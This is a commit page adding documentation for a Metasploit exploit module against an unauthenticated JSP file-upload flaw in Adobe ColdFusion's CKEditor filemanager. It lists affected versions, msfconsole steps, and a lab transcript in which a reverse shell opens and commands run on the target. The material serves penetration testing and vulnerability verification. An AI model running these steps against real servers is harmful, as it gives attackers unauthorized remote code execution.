Add doc coldfusion_ckeditor_file_upload

GSoC/Meterpreter_Web_Console
Jacob Robles 2019-01-10 06:40:38 -06:00
parent b81f59e7b1
commit 33b8735d1c
No known key found for this signature in database
GPG Key ID: 3EC9F18F2B12401C
1 changed files with 51 additions and 0 deletions

View File

@ -0,0 +1,51 @@
## Description
A file upload vulnerability in the CKEditor of Adobe ColdFusion 11
(Update 14 and earlier), ColdFusion 2016 (Update 6 and earlier), and
ColdFusion 2018 (July 12 release) allows unauthenticated remote
attackers to upload and execute JSP files through the filemanager
plugin. Tested on Adobe ColdFusion 2018 v2018.0.0.310739.
## Vulnerable Application
ColdFusion 11 (Update 14 and earlier),
ColdFusion 2016 (Update 6 and earlier), and
[ColdFusion 2018 (July 12 release)](https://bintray.com/eaps/coldfusion/cf%3Acoldfusion/2018.0.0)
## Verification Steps
1. `./msfconsole -q`
2. `use exploit/multi/http/coldfusion_ckeditor_file_upload`
3. `set rhosts <rhost>`
4. `set lhost <lhost>`
5. `exploit`
6. Get a shell
## Scenarios
### Tested on Coldfusion 2018 v2018.0.0.310739
```
msf5 > use exploit/multi/http/coldfusion_ckeditor_file_upload
msf5 exploit(multi/http/coldfusion_ckeditor_file_upload) > set rhosts 172.22.222.142
rhosts => 172.22.222.142
msf5 exploit(multi/http/coldfusion_ckeditor_file_upload) > set lhost 172.22.222.136
lhost => 172.22.222.136
msf5 exploit(multi/http/coldfusion_ckeditor_file_upload) > exploit
[*] Started reverse TCP handler on 172.22.222.136:4444
[*] Uploading the JSP payload at /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/ASMK.jsp...
[+] Upload succeeded! Executing payload...
[*] Command shell session 1 opened (172.22.222.136:4444 -> 172.22.222.142:43262) at 2019-01-10 06:30:52 -0600
whoami
cfuser
uname -a
Linux 6bd4238e7ffb 4.15.0-38-generic #41-Ubuntu SMP Wed Oct 10 10:59:38 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
exit
[*] 172.22.222.142 - Command shell session 1 closed.
msf5 exploit(multi/http/coldfusion_ckeditor_file_upload) >
```